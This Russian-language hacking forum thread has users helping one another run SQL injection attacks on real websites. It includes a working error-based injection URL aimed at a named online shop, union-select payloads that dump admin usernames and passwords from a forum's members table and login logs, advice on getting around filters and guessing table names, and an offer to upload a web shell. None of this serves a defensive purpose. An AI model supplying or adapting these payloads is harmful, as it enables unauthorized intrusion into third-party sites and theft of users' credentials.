Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    так что дай адрес, шелл зальем, самому любопытно стало :)
     
  2. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    так пишет

    Unknown column '4348415241435445525F53455453' in 'where clause'
     
  3. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    потому что нужно unhex(hex())

    зы

    http://www.shop-stroitel.ru/catalog/?id=14+or+1+group+by+concat((select+table_name+from+information_schema.tables+limit+0,1),rand(0)|0)+having+min(0)--+
     
    _________________________
    3 people like this.
  4. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    Вывод в hex, поэтому нужно конвертировать в строку.
    unhex(4348415241435445525F53455453) = 'CHARACTER_SETS'.
     
    1 person likes this.
  5. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    https://rdot.org/forum/showthread.php?t=105&page=7 - 65 пост
    Внешне похож, размер тоже совпадает (28кб)
     
  6. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    914
    Reputations:
    363
    запрос такой
    SELECT * FROM articole WHERE id = -797 union select 1,2,table_name,4,5,6,7 infornation_schema.tables limit 1,1--
    ему точка не нравится, или он запрос урезает?
     
    _________________________
  7. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Думаю фильтруется точка.
     
  8. Iggy

    Iggy New Member

    Joined:
    24 Jun 2010
    Messages:
    104
    Likes Received:
    4
    Reputations:
    1
    Ахаха)) ага, только вот как назло php стоитна выполнение - и качнуть его как не получается))

    м, глянул твой пост - красиво вскрыл!
     
  9. Чакэ

    Чакэ Elder - Старейшина

    Joined:
    15 Aug 2010
    Messages:
    260
    Likes Received:
    66
    Reputations:
    62
    infornation написано с ошибкой.
     
  10. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    914
    Reputations:
    363
    чакэ, да, ошибся, но запрос не изменило
    Ereee, как можно послать запрос? hex? он не сработал
     
    _________________________
    1 person likes this.
  11. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    При такой опечатке выдало бы другую ошибку.

    faza02,
    hex тебе не поможет, я думаю фильтрацию точки обойти нельзя. Попробуй брутить имена таблиц(стандартные users, admin, members и т.д.), смотри на движки и узнай имена таблиц здесь:
    http://dbitems.wen.ru
     
    1 person likes this.
  12. Чакэ

    Чакэ Elder - Старейшина

    Joined:
    15 Aug 2010
    Messages:
    260
    Likes Received:
    66
    Reputations:
    62
    как я такое бревно не заметил :D select ololo from information..
     
    4 people like this.
  13. York

    York New Member

    Joined:
    6 Jan 2012
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    Здаствуйте!
    Не могу найти пасс админа. Итак, базы:
    Нашел что-то похожее на правду в базе ibf_admin_login_logs:
    По структуре:
     
  14. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    2York,
    -1'+union+select+1,concat(name,0x3a,password),3+from+ibf_members+limit+0,1--+a
     
  15. Чакэ

    Чакэ Elder - Старейшина

    Joined:
    15 Aug 2010
    Messages:
    260
    Likes Received:
    66
    Reputations:
    62
    сливай бд через columns, а не tables. а там заодно тяни table_name & table_schema сразу будет видно что где лежит..
     
  16. York

    York New Member

    Joined:
    6 Jan 2012
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    Попродробней что значит тяни и как тянуть?) Ссылка такая получилась - -223+union+select+1,group_concat(admin_id,0x3a,admin_ip_address,0x3a,admin_username,0x3a,admin_time,0x3a,admin_success,0x3a,admin_post_details),3,4,5,6+from+ibf_admin_login_logs
     
  17. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,258
    Reputations:
    274
    хрен ты там найдешь логин админа..они совсем в другой таблице...изучи сначала структуру ИПБ потом изучи синтаксис мускуля..
     
    2 people like this.
  18. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    York

    почитайте статьи, срач запрещено

    NZT, вопросы по сканерам и по крекерам интернета отправьте в гугл =\
     
    _________________________
  19. [R]eD

    [R]eD Elder - Старейшина

    Joined:
    1 Aug 2006
    Messages:
    72
    Likes Received:
    1
    Reputations:
    0
    есть скуля, все выводится и работает но посылая например такой запрос

    SELECT `name` FROM `users` WHERE `user_id` = 1

    сервер переводит имя таблицы в верхний регистр (USERS)
    т.к. сервер на линуксе то там по умолчанию зависит от регистра букв.

    вот вопрос, как это можно обойти, никакие lower и т.п. не подходят по ясной причине
     
  20. NZT

    NZT New Member

    Joined:
    31 Dec 2011
    Messages:
    25
    Likes Received:
    1
    Reputations:
    0
    Konqi со всем уважением к форуму я не могу найти ответ в гугле, я искал до и после того как задать свой ворпрос здесь и ответа не нашел. Я не знаю как мне решить проблему , можно я еще раз задам здесь свой вопрос?
     
Thread Status:
Not open for further replies.